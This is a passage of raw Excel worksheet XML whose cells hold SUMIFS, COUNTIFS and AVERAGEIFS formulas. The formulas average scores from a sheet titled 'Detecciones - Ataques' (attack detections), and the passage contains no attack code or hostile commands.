        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>0.3</v>
      </c>
      <c r="AD137" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>0.00119760479</v>
      </c>
      <c r="AE137" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>0.2</v>
      </c>
      <c r="AF137" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DD$3:$DD$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="AG137" s="271"/>
      <c r="AH137" s="386" t="s">
        <v>2556</v>
      </c>
      <c r="AI137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.01073694485</v>
      </c>
      <c r="AJ137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AK137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>0</v>
      </c>
      <c r="AL137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3521052632</v>
      </c>
      <c r="AR137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AS137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>0</v>
      </c>
      <c r="AU137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>1</v>
      </c>
      <c r="AV137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>0</v>
      </c>
      <c r="AW137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1</v>
      </c>
      <c r="AY137" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BA137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="BB137" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0</v>
      </c>
      <c r="BD137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>0</v>
      </c>
      <c r="BF137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="BG137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="BH137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>0</v>
      </c>
      <c r="BI137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="BM137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>0.1593487395</v>
      </c>
      <c r="BN137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>0.25</v>
      </c>
      <c r="BO137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>0</v>
      </c>
      <c r="BR137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>1</v>
      </c>
      <c r="BT137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>0</v>
      </c>
      <c r="BX137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0</v>
      </c>
      <c r="BZ137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>0</v>
      </c>
      <c r="CA137" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC137" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>1</v>
      </c>
      <c r="CG137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>0</v>
      </c>
      <c r="CI137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>0</v>
      </c>
      <c r="CJ137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>1</v>
      </c>
      <c r="CL137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0</v>
      </c>
      <c r="CN137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>0.5</v>
      </c>
      <c r="CP137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>0.5</v>
      </c>
      <c r="CQ137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="CR137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CT137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.005988023952</v>
      </c>
      <c r="CU137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="CW137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="CY137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0</v>
      </c>
      <c r="CZ137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH137" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1</v>
      </c>
      <c r="DI137" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ137" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1</v>
      </c>
      <c r="DK137" s="271"/>
    </row>
    <row r="138">
      <c r="J138" s="277"/>
      <c r="K138" s="512"/>
      <c r="L138" s="512"/>
      <c r="M138" s="512"/>
      <c r="N138" s="512"/>
      <c r="O138" s="278"/>
      <c r="Q138" s="271"/>
      <c r="R138" s="386" t="s">
        <v>2557</v>
      </c>
      <c r="S138" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.1684561575</v>
      </c>
      <c r="T138" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="U138" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>0.3760526316</v>
      </c>
      <c r="V138" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="W138" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="X138" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>0.5714285714</v>
      </c>
      <c r="Y138" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>0.2</v>
      </c>
      <c r="Z138" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>0.3470256524</v>
      </c>
      <c r="AA138" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>0.5384615385</v>
      </c>
      <c r="AB138" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="AC138" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="AD138" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>0.00119760479</v>
      </c>
      <c r="AE138" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ET$3:$ET$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>0.2</v>
      </c>
      <c r="AF138" s="502">
        <f>(
    SUMIFS(
